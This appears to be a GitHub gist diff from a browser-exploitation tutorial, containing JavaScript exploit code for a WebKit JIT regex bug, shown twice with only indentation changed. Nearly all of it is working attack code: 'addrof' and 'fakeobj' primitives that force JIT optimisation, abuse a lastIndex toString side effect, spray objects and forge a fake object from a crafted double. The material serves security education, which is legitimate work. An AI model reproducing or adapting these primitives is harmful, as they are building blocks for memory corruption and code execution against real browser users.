LiveOverflow · June 22, 2019 23:12
diff --git a/test.js b/test.js
 // based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
 // tutorial: https://liveoverflow.com/tag/browser-exploitation/
 // playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

 // addrof primitive
 function addrof(val) {
    var array = [13.37];
    var reg = /abc/y;
        
    // Target function
    var AddrGetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        return array[0];
    }
    
    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrGetter(array);
    
    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = val;
        return "0";
    };
    reg.lastIndex = regexLastIndex;
    
    // Do it!
    return AddrGetter(array);
 }

 // fakeobj primitive
 function fakeobj(dbl) {
    var array = [13.37];
    var reg = /abc/y;
        
    // Target function
    var AddrSetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        array[0] = dbl;
    }
    
    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrSetter(array);
    
    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = {};
        return "0";
    };
    reg.lastIndex = regexLastIndex;
    
    // Do it!
    AddrSetter(array);
    return array[0];
 }

 for(var i=0; i<0x2000; i++) {
    test = {}
    test.x = 1
    test['prop_'+i] = 2
 }

 fake = {}
 fake.a = 7.082855106403439e-304
 fake.b = 2
 fake.c = 1337
 delete fake.b

 adr = addrof(fake)

 print(adr)

 // should return the same object. to fake the object you have to first move the address forward 0x10. See the video for how to do that with python
 hax = fakeobj(adr)
	// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
	// tutorial: https://liveoverflow.com/tag/browser-exploitation/
	// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

	// addrof primitive
	function addrof(val) {
	var array = [13.37];
	var reg = /abc/y;

	// Target function
	var AddrGetter = function(array) {
	//reg[Symbol.match]();
	"abc".match(reg);
	return array[0];
	}

	// Force optimization
	for (var i = 0; i < 10000; ++i)
	AddrGetter(array);

	// Setup haxx
	regexLastIndex = {};
	regexLastIndex.toString = function() {
	array[0] = val;
	return "0";
	};
	reg.lastIndex = regexLastIndex;

	// Do it!
	return AddrGetter(array);
	}

	// fakeobj primitive
	function fakeobj(dbl) {
	var array = [13.37];
	var reg = /abc/y;

	// Target function
	var AddrSetter = function(array) {
	//reg[Symbol.match]();
	"abc".match(reg);
	array[0] = dbl;
	}

	// Force optimization
	for (var i = 0; i < 10000; ++i)
	AddrSetter(array);

	// Setup haxx
	regexLastIndex = {};
	regexLastIndex.toString = function() {
	array[0] = {};
	return "0";
	};
	reg.lastIndex = regexLastIndex;

	// Do it!
	AddrSetter(array);
	return array[0];
	}

	for(var i=0; i<0x2000; i++) {
	test = {}
	test.x = 1
	test['prop_'+i] = 2
	}

	fake = {}
	fake.a = 7.082855106403439e-304
	fake.b = 2
	fake.c = 1337
	delete fake.b

	adr = addrof(fake)

	print(adr)

	// should return the same object. to fake the object you have to first move the address forward 0x10. See the video for how to do that with python
	hax = fakeobj(adr)